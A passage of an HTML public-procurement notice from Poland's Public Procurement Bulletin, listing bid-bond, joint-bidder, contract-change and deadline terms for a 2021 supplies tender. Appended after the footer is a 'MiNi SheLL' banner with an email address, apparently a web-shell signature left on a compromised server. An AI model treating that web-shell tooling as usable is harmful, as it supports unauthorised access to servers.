odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Pełnomocnictwo do reprezentowania Wykonawcy, w przypadku, gdy prawo do podpisania<br/>oferty nie wynika z dokumentów rejestrowych Wykonawcy. Pełnomocnictwo należy złożyć wraz<br/>z ofertą.<br/>2. W przypadku jeśli wadium wnoszone jest w innej formie niż pieniądz, w terminie na składanie<br/>ofert należy złożyć oryginał gwarancji lub poręczenia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wadium w kwocie: 6 000,00 zł<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2020 r. poz. 299). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:a) do oferty dołączają dokument<br/>ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia<br/>publicznego zgodnie z art. 58 ust. 1 ustawy Pzp. W treści pełnomocnictwa lub w osobnym<br/>oświadczeniu Wykonawca wskaże informację, z której wynika, które usługi wykonają<br/>poszczególni Wykonawcy, zgodnie z art. 117 ust. 4 ustawy Pzp. b) składają odrębne<br/>oświadczenie o którym mowa w art. 125 ust. 1 ustawy Pzp, składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. Oświadczenia informują o niepodleganiu wykluczeniu,<br/>spełnianiu warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z rodzajem i zakresem zmian oraz warunkami ich wprowadzenia, szczegółowo<br/>opisanym w Istotnych postanowieniach umowy stanowiących załącznik do Specyfikacji<br/>Warunków Zamówienia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać drogą elektroniczną na adres: https://epuap.gov.pl/wps/portal/strefa-klienta/katalog-spraw/profil-urzedu/GCIGdansk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-06 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-04</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-20 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com